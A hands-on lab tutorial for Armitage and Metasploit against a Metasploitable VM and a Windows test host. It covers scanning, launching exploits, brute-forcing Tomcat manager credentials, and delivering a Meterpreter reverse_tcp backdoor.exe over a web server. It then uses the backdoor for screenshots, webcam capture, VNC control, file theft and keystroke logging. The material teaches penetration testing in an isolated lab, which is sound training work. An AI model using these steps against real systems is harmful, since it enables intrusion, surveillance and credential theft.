Armitage Introduction Lab Prerequisites This lab will help introduce you to Armitage for Metasploit. Before we begin, you will need the following virtual machines: Metasploitable Linux Virtual Machine BackTrack 5r1 Virtual Machine Set both Virtual Machine network adapters to the NAT setting. Setup BackTrack Linux 1. Login as username root, password toor 2. Type dhclient to request an IP address 3. Type startx to launch X-Windows 4. Open a Terminal 5. Type: msfupdate to update Metasploit and Armitage to the latest versions Metasploitable 1. Login as username msfadmin, password msfadmin 2. Type sudo dhclient to request an IP address Take note of the IP address of the Metasploitable virtual machine. You will need it for the remainder of this lab. Start Armitage 1. Open a terminal 2. Type: armitage and press enter 3. A dialog will ask if you'd like to start Metasploit's RPC server. Press Yes. Wait for Armitage to connect to Metasploit. You will see Connection Refused multiple for up to two minutes. This is normal. If something else happens, press Cancel and then press Help to troubleshoot the issue. Reconnaissance These steps will show you how to perform reconnaissance against the Metasploitable host. Remember that some scan techniques are more thorough than others. 1. Go to Hosts -> MSF Scans 2. Type in the IP address of the Metasploitable VM and press Ok 3. Right-click the host that appears in Armitage and select Services 4. Wait 30 seconds and press Refresh Do not close the Services tab, we're going to compare the existing results to the results from another (more thorough) scan in a moment. 5. Go to Hosts -> Clear Database 6. Go to Hosts -> NMap -> Intense Scan, all TCP Ports 7. Type in the IP address of the Metasploit VM and press Ok An NMap Tab will open. Wait for a dialog that says Scan complete before proceeding. 8. Right-click the Metasploitable host and select Services How do the results of the Intense NMap Scan compare to the results of the Metasploit scan? Try to repeat this process for other scans to appreciate the differences in the information they each provide. Web Application Exploitation These steps will show you how to check which exploits a service is vulnerable to. 1. Go to Attacks -> Find Attacks 2. Right-click Metasploitable and navigate to: Attacks -> webapp -> Check Exploits 3. In the Check Exploits tab, press Control+F and search for "vulnerable" without the quotes. 4. Right-click Metasploitable and navigate to: Attacks -> webapp -> [an attack that Metasploitable is vulnerable to] 5. Press Launch 6. Right-click Metasploitable and navigate to: Shell 1 -> Interact 7. To close the session, right-click Metasploitable -> Shell 1 -> Disconnect Service Exploitation These steps will guide you through finding another exploitable service and obtaining another shell session. 1. Go to Attacks -> Find Attacks If you did this for the Web Application Exploitation steps, you don't need to do it again. Doing it again doesn't hurt anything though. 2. Right-click Metasploitable and navigate to the Attacks menu 3. Select an exploit, don't change any options, and click Launch. Repeat this step until you find one that works. Hint: there are two other exploits in the Attacks menu that will work without any modification. Do not close the Shells you receive from your service exploitation in this step. Linux Shell Post Exploitation To accomplish these steps, you must have root access to the Metasploitable system. 1. Right-click Metasploitable and go to Shell N -> Interact for each of your shell sessions 2. In each shell type: whoami 3. Find the shell that has a root user. This is the shell that you will use for these instructions. 4. Right-click Metasploitable and go to the root shell session: Shell N -> Post Modules 5. Double-click the enum_linux module in the module browser. 6. Press Launch 7. Go to View -> Loot 8. Double-click an item to view it. The enum_linux module automatically captures a lot of data about a Linux system. Here are a few questions to answer as you go through all of this data: 1. Which version of apparmor is installed? 2. How many users with passwords and valid shells (e.g., /bin/bash or /bin/sh) are on the system? 3. Which command did msfadmin use previously to reset the logs on the system? Tomcat Attack These steps will walk you through attacking Apache Tomcat. You will learn how to brute force a service, search for a relevant attack, and conduct post-exploitation using the Java version of Meterpreter. 1. Search for the tomcat_mgr_login module in the module browser 2. Double-click tomcat_mgr_login 3. The default RPORT is 8080. Apache Tomcat is on Metasploitable, but it's not this port. Change the RPORT value to the correct port. Hint: Right-click Metasploitable and select Services. 4. Press Launch 5. Press Ctrl+F in the tomcat_mgr_login tab and search for "success" Great, you now have credentials you may use to access the Apache Tomcat service. Let's find out what you can do with these credentials... 6. Search for tomcat in the module browser. 7. Double-click the tomcat related exploit 8. Set USERNAME, PASSWORD, and RPORT to the values you discovered in steps 1-5. If everything is correct, you will now have a Java meterpreter session on the Metasploitable host. Right-click Metasploitable -> Meterpreter and play with the options to see what is available to you. Meterpreter has a lot more power than a simple shell session. Exploring Windows Meterpreter is the subject of the bonus lab. Bonus Lab: Post Exploitation 1. Prerequisites To complete this lab, you will need a Windows target. The steps in this lab will work for a Windows XP, Windows Vista, and Windows 7 target. Your attack host should be BackTrack Linux 5r1 with the latest version of Armitage and Metasploit. 2. Steps Generate a Backdoor and Listener (BackTrack Linux): Follow these steps to generate an executable version of Metasploit's super payload, Meterpreter. These steps will have you save the executable in the default directory for serving files over HTTP. These steps will also have you setup a multi/handler to receive connections from Meterpreter. 1. Start Armitage 2. In the module browser navigate to: payloads -> windows -> meterpreter -> reverse_tcp 3. Change RPORT to 9898 4. Change Output to exe 5. Hold the shift button and click Launch 6. Save the file to /var/www/backdoor.exe 7. Change Output to multi/handler 8. Click Launch Start a webserver (BackTrack Linux) Follow these steps to start the Apache webserver. You will also use need to learn the IP address of your BackTrack host. 1. Open a terminal 2. Type: service start apache2 3. Use ifconfig to learn the ip address of your BackTrack Linux host. Get in through the backdoor (Windows Victim) Follow these steps to "exploit" your Windows host. Really, you're just downloading the Meterpreter executable and running it. 1. Open Internet Explorer 2. Navigate to http://[ip address of BackTrack Linux host/backdoor.exe 3. Run the file Post Exploitation (BackTrack Linux) You should now see a red computer with lightning bolts around it in Armitage. This is your Windows target. These steps will take you through various post-exploitation actions with Armitage. After these steps, you will have an appreciation for how much Meterpreter can do. I see you... 1. Right-click the compromised host and navigate to: Meterpreter 1 -> Explore -> Screenshot 2. Right-click the compromised host and navigate to: Meterpreter 1 -> Explore -> Webcam Shot This will only work if your Windows host has a webcam attached. Remote Control 1. Right-click the compromised host and navigate to: Meterpreter 1 -> Interact -> Desktop (VNC) Armitage will open a dialog telling you the port and display number to connect a VNC client to. Take note of the port number. Here I will use 53. It will be something different for you. 2. Open a Terminal in BackTrack Linux 3. Type: vncviewer 127.0.0.1:53 Change 53 to the display number provided by Armitage. Get the Data 1. Right-click the compromised host and navigate to: Meterpreter 1 -> Explore -> File Browser 2. In the file path text field (top of the browser), type C:\ and hit Enter. 3. Navigate to your desktop 4. Download a file 5. Go to: View -> Downloads 6. Double-click the file to view it Capture your Key Strokes 1. Right-click the compromised host and navigate to: Meterpreter 1 -> Explore -> Log Keystrokes 2. Press Launch 3. From your Windows target: navigate to a website that you use, log out, and log in by typing your credentials. 4. Take a look at the output of the Log Keystrokes tab.